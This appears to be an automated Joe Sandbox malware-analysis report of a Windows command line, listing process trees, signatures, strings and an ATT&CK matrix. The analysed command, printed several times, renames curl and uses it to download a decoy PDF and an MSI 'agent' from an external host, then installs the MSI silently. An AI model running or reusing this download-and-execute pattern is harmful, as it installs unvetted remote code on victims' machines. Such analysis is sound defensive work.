Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report

Overview

General Information

Analysis ID:1528042
Infos:

Detection

Score:8
Range:0 - 100
Whitelisted:false
Confidence:40%

Signatures

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6456 cmdline: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6724 cmdline: "C:\Windows\System32\cmd.exe" /c cd /d "C:\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • TNheBOJElq.exe (PID: 6796 cmdline: TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
    • TNheBOJElq.exe (PID: 6844 cmdline: TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
    • msiexec.exe (PID: 6884 cmdline: C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7004 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Suspicious Copy From or To System Directory
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn", CommandLine: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3756, ProcessCommandLine: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn", ProcessId: 6456, ProcessName: cmd.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_00E4F860
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4F820 CryptAcquireContextA,CryptCreateHash,3_2_00E4F820
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,3_2_00E4F02B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E46400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_00E46400
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,3_2_00E4EC10
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E46591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_00E46591
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,3_2_00E4C6E0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E43EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free,3_2_00E43EA4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_00E4C750
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4C730 CryptHashData,3_2_00E4C730
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: -----BEGIN PUBLIC KEY-----3_2_00E277F7
Source: TNheBOJElq.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr
Source: unknownDNS traffic detected: query: 241.42.69.40.in-addr.arpa replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E1D8C0 recv,WSAGetLastError,3_2_00E1D8C0
Source: TNheBOJElq.exeString found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe.0.drString found in binary or memory: Usage: curl [options...] <url>
Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: TNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/P
Source: TNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
Source: TNheBOJElq.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: TNheBOJElq.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/docs/sslcerts.html
Source: TNheBOJElq.exeString found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E115353_2_00E11535
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E3A8D83_2_00E3A8D8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E2C1FD3_2_00E2C1FD
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E1A9B33_2_00E1A9B3
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E0E1273_2_00E0E127
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E1FAEC3_2_00E1FAEC
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4CAA03_2_00E4CAA0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E533B03_2_00E533B0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E144153_2_00E14415
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E225B83_2_00E225B8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: String function: 00E12564 appears 48 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: String function: 00E1D632 appears 245 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: String function: 00E120E6 appears 46 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: String function: 00E1D6AD appears 301 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: String function: 00E0913E appears 64 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: String function: 00E1201D appears 39 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: String function: 00E1251E appears 48 times
Source: classification engineClassification label: clean8.win@11/3@1/0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E0310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,3_2_00E0310D
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: TNheBOJElq.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: TNheBOJElq.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: TNheBOJElq.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: TNheBOJElq.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: TNheBOJElq.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agentJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qnJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: secur32.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: secur32.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E1D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,3_2_00E1D33A
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-41215
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeAPI coverage: 3.3 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: TNheBOJElq.exe, 00000003.00000003.1638561356.00000000034C0000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000004.00000003.1641387385.0000000003460000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E5155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00E5155B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E1D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,3_2_00E1D33A
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E50CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00E50CB4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E5155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00E5155B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E516BE SetUnhandledExceptionFilter,3_2_00E516BE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agentJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qnJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ""c:\windows\system32\cmd.exe" /c cd /d "c:\" & copy c:\windows\system32\curl.exe tnhebojelq.exe & tnhebojelq.exe -o "c:\qmqjabdqio.pdf" hxxps://dbs5.pwods.com/download/pdf & "c:\qmqjabdqio.pdf" & tnhebojelq.exe -o blhlldebqq.msi hxxps://dbs5.pwods.com/download/agent & c:\windows\system32\msiexec.exe /i blhlldebqq.msi /qn"
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E5137A cpuid 3_2_00E5137A
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E51775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00E51775
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E3A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free,3_2_00E3A8D8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,3_2_00E4699F
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E38490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,3_2_00E38490
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E1DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,3_2_00E1DEDF

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services11
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API		Boot or Logon Initialization Scripts1
DLL Side-Loading		11
Process Injection		LSASS Memory11
Security Software Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS22
System Information Discovery		Distributed Component Object ModelInput Capture2
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528042 Cookbook: defaultwindowscmdlinecookbook.jbs Startdate: 07/10/2024 Architecture: WINDOWS Score: 8 21 241.42.69.40.in-addr.arpa 2->21 6 cmd.exe 2 2->6         started        9 msiexec.exe 2->9         started        process3 file4 19 C:\Program Files (x86)\...\TNheBOJElq.exe, PE32 6->19 dropped 11 conhost.exe 6->11         started        13 msiexec.exe 6->13         started        15 cmd.exe 1 6->15         started        17 2 other processes 6->17 process5

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
241.42.69.40.in-addr.arpa
unknown
unknownfalse
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
